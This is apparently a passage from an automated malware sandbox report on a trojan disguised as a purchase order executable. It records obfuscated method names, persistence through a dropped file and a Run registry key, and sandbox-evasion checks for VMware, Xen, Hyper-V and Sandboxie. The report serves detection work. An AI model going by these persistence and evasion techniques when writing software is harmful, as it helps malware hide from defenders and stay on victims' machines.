                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, QaLSAjfMxyDIYodqKd0.csHigh entropy of concatenated method names: 'lTKfsQKndC', 'svMdMkcIRUEaDh0x3t3', 'cc6CPucTlOYfcjpRR3h', 'I8J4GNcaV6TZATiTQtg', 'lZlBj4cQf9ZMi1kak2F', 'jF53gpc6KCo0QmPiyT8', 'JDkohVcCdpBDPO44NQY', 'IjIcUEcwBiMbqGiBr81'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, iVay2ZksSq6AL3cYeAG.csHigh entropy of concatenated method names: 'mhrkSbQUKr', 'zFlkrb8PTP', 'Uh3kPXyQgq', 'Kxfk1ml5FX', 'cuekODgfkw', 'fpGtTMPIE4ECYD37aS3', 'AGZZa2PTnHGeUgJqH7x', 'eBPyGhPay4078Hcm2WV', 'cOj8M0PQjQGfee96o2v', 'FJYEMKP6yXZIRs8JxWU'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, yI15OhMwaKnD9LWXIu.csHigh entropy of concatenated method names: 'prXsLq1dZ', 'ANZ97fVx4', 'vlXrRpZSB', 'p6lSvWo9v', 'Tc5wg2SaneLfqmBQS0g', 'EGdYsPSQvbATEmqS4XN', 'gUj3tfS6qeApEOn6KGa', 'vBikmRSz0tOA55CsCJc', 'NXjUTRrXX7IWcnpGXlx', 'nryRTTSID18easuyLxV'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, aBeQQmfjm2CxkGbWUFW.csHigh entropy of concatenated method names: 'sx6fvoqmZi', 'WsgfFhqnuq', 'FpAfDvX06n', 'AknfqBvL25', 'Xtvp6pjHddesL43Kofk', 'tmnwOWjBNncgk8J7Pap', 'PMqeEQjn7rVuuNJsfO7', 'R50QCFjtJIWwadabkbE', 'Wuueb8jYWvYu3IDLNPd', 'PP6jNyjAXhqdmYaQYIY'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, pD0QF3Us5tqm4WgmIGm.csHigh entropy of concatenated method names: 'Hs0YcSgjy1', 'wHcM3RqUedZjFLTZwBg', 'popKKmqbiDnbnWrBRj3', 'gaQb6OqEJEp327ecOMN', 'nagctPqoXL9jQLRWHEY', 'Ophlc1qiiXatUoQTpR2', 'NRN4u4qf5nhb3Kk8dJT', 'BqWK3wqerCkNsCaRKOt', 'MK9yLuqNfW5ZlpHs3lG'
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeFile created: C:\Users\user\AppData\Roaming\Xpnzea.exe
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Xpnzea
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match File source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory allocated: 26E0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory allocated: 28B0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory allocated: 26E0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2610000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2880000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2680000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory allocated: 1080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory allocated: 2C50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory allocated: 2A60000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2680000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2800000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4800000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory allocated: F90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory allocated: 28B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory allocated: 1010000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: CA0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 29F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 49F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: Xpnzea.exe, 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: Xpnzea.exe, 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                        Source: InstallUtil.exe, 00000007.00000002.1727595949.0000000005B80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%|
                        Source: InstallUtil.exe, 00000009.00000002.2702774592.0000000005C90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllodeE
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1464343248.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1642858240.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1625844362.0000000001101000.00000004.00000020.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1702993833.0000000000968000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Process information queried: ProcessInformation
